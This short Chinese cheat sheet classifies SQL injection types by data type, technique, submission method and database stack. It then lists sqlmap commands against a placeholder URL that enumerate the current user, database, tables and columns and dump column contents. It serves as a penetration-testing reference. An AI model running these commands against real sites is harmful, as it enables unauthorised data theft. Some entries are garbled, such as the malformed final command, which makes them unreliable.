SQL分类:
- 按照数据类型分类:
>整形注入
>字符型注入
- 按照注入语法分类
>UNION query SQL injection(可联合查询注入)
>Error-based SQL injection(报错型注入)
> Boolean-based blind SQL injection(布尔型注入)
>Time-based blind SQL injection(基于时间延迟注入)
>Stacked queries SQL injection (可多语句查询注入0)
- 按照数据提交方式分类
> post
> get
> cookie
- 按照数据库类型分类
> php+mysql
> asp+access
> asp+ orecal
SQLMAP常用命令:
#获取当前用户名称:
sqlmap.py -u "http://xx.com/new?id=1" --current-user
#获取当前数据库名称:
sqlmap.py -u "http://xx.com/new?id=1" --current-db
#列表名:
sqlmap.py -u "http://xx.com/new?id=1" --tables -D “db_name”
#列字段:
sqlmap.py -u "http://xx.com/new?id=1" --columns -T "tablename" -D "db_name"
#获取字段内容:
sqlmap.py -u "http://xx.com/new?id=1" --current-dbtablename" --dump -C "column_name" -T "tablename" -D "db-name"
网友评论